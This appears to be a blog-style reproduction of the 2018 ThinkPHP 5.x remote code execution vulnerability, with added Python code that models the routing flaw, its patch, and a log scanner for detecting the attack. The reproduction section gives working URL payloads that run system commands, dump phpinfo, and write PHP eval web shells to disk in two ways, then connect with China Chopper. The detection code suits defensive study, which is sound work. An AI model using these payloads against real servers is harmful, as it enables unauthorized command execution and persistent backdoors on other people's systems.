ThinkPHP 5.x remote command execution vulnerability reproduction
I. Vulnerability description
On December 10, 2018, ThinkPHP officially released a security update that fixes a high-risk vulnerability in the ThinkPHP5 framework: https://blog.thinkphp.cn/869075
The root cause is that the framework does not sufficiently check the controller name, so when forced routing is not enabled (it is off by default) the flaw can lead to remote code execution. Affected versions include 5.0 and 5.1.
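To make the root cause concrete, here is an added Python model of the routing step (this is my illustration, not ThinkPHP's own code): it splits the s parameter into module/controller/action the way ThinkPHP 5.0 does without forced routing, shows that before the fix a controller segment containing a backslash is resolved as a fully qualified class name, and shows the whitelist check from the update rejecting such a segment. The exact whitelist pattern is my understanding of the published fix and should be treated as an assumption.

```python
import re

# Whitelist for the controller segment of a route: a letter followed by word
# characters or dots. This mirrors the check added to think\App in the
# 5.0.23 / 5.1.31 security update as I understand it; treat the exact
# pattern as an assumption rather than a quote of the framework source.
CONTROLLER_NAME_RE = re.compile(r'^[A-Za-z](\w|\.)*$')


def parse_route(s_param: str) -> tuple[str, str, str]:
    """Split the value of the ``s`` parameter into (module, controller, action).

    Models the slash-separated dispatch ThinkPHP 5.0 applies when forced
    routing is off (the default): leading/trailing slashes are ignored and
    the first three segments are taken as module/controller/action.
    """
    parts = [p for p in s_param.split('/') if p]
    if len(parts) < 3:
        raise ValueError(f'route has fewer than three segments: {s_param!r}')
    return parts[0], parts[1], parts[2]


def is_controller_allowed(controller: str) -> bool:
    """True when the controller segment passes the whitelist."""
    return CONTROLLER_NAME_RE.match(controller) is not None


def resolve_controller(s_param: str, patched: bool) -> tuple[str, str, str]:
    """Return (outcome, class_or_segment, action) for a route.

    Unpatched: a controller segment containing a backslash is treated as a
    fully qualified class name and loaded as-is, which is the root cause.
    Patched: the whitelist rejects such segments before any class lookup
    (the framework answers with a 404 "controller not exists").
    """
    module, controller, action = parse_route(s_param)
    if patched and not is_controller_allowed(controller):
        return 'rejected', controller, action
    if '\\' in controller:
        return 'namespaced-class', controller, action
    # Normal case: the controller lives under app\<module>\controller\.
    return 'app-controller', f'app\\{module}\\controller\\{controller.capitalize()}', action


if __name__ == '__main__':
    for route in ('index/index/index', 'index/think\\app/invokefunction'):
        for patched in (False, True):
            print(f'{route:35} patched={patched!s:5} -> {resolve_controller(route, patched)}')
```

Running it prints, for each route, what the unpatched and patched dispatch would resolve to; the only difference the fix makes is that a controller segment outside the whitelist never reaches the class loader.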
II. Affected versions
ThinkPHP 5.x to ThinkPHP 5.1.31
ThinkPHP 5.0.x <= 5.0.23
III. Reproducing the vulnerability
1. Download the official ThinkPHP 5.0.22 from: http://www.thinkphp.cn/donate/download/id/1260.html
2. Set up the environment with phpStudy, extract the downloaded ThinkPHP 5.0.22 into the web root directory, and open http://192.168.10.171/thinkphp5.0.22/public in a browser.
3. Remote command execution via the system function
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
4. Viewing phpinfo() output via the phpinfo function
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
5. Writing a shell
Payload as follows:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php
Note: the ^ is required as an escape (the escape character of the Windows cmd environment); in a Windows environment the string that echo writes to the output file must not be wrapped in quotes (neither single nor double), and some special characters work in the URL without being URL-encoded.
6. Check whether the shell was written successfully
7. Connect with China Chopper
8. Second way of writing the shell
Payload as follows:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
9. Check whether the file was written successfully
10. Connect with China Chopper
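From the defender's side, requests of the shape shown above leave a clear trace in the web server access log. The following Python example is added here and is not part of the original post: it parses constructed Apache-style log lines (the IPs, timestamps and paths are made up), percent-decodes the query string, and flags a request when the controller segment of the s parameter fails the whitelist, when the route targets invokefunction, or when the function parameter names a callable dispatcher such as call_user_func_array. The log format and the detection rules are my assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (Apache combined-style). The first and
# third requests carry the route shape from the reproduction steps above; the
# second is an ordinary request to the default controller.
SAMPLE_LOG = """\
192.168.10.200 - - [11/Dec/2018:10:01:02 +0800] "GET /thinkphp5.0.22/public/?s=index/think%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=whoami HTTP/1.1" 200 512
192.168.10.200 - - [11/Dec/2018:10:01:05 +0800] "GET /thinkphp5.0.22/public/?s=index/index/index HTTP/1.1" 200 1024
192.168.10.201 - - [11/Dec/2018:10:02:17 +0800] "GET /thinkphp5.0.22/public/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=../test.php&vars%5B1%5D%5B%5D=test HTTP/1.1" 200 0
"""

# Assumed log layout: client - - [timestamp] "METHOD URL PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)

# Same controller-name whitelist as the framework's fix (my reading of it).
CONTROLLER_NAME_RE = re.compile(r'^[A-Za-z](\w|\.)*$')

# PHP helpers that turn a user-supplied string into a function call.
CALLABLE_DISPATCHERS = {'call_user_func', 'call_user_func_array'}


def analyze_request(url: str) -> list[str]:
    """Return a list of reasons the request looks like this attack (empty = clean)."""
    reasons = []
    parts = urlsplit(url)
    qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes keys and values
    route = qs.get('s', [''])[0]
    segments = [seg for seg in route.split('/') if seg]

    # Controller segment outside the whitelist (e.g. contains a backslash).
    if len(segments) >= 2 and not CONTROLLER_NAME_RE.match(segments[1]):
        reasons.append(f'controller segment fails whitelist: {segments[1]!r}')

    # Route aimed at the framework's invokefunction action.
    if len(segments) >= 3 and segments[2].lower() == 'invokefunction':
        reasons.append('route targets invokefunction')

    # function= naming a callable dispatcher, which takes its target from vars[].
    func = qs.get('function', [''])[0].lower()
    if func in CALLABLE_DISPATCHERS:
        reasons.append(f'function={func} with user-supplied vars')

    return reasons


def scan_log(text: str) -> list[dict]:
    """Run analyze_request over every parseable log line and collect the hits."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed layout
        reasons = analyze_request(m['url'])
        if reasons:
            hits.append({'ip': m['ip'], 'time': m['ts'],
                         'status': m['status'], 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']}")
        for reason in hit['reasons']:
            print(f'    - {reason}')
```

Each of the three checks fires independently, so a request that only fails the controller whitelist (a different action, or a different function name) is still reported; the status code is carried along because a 200 on such a request is the case worth escalating first.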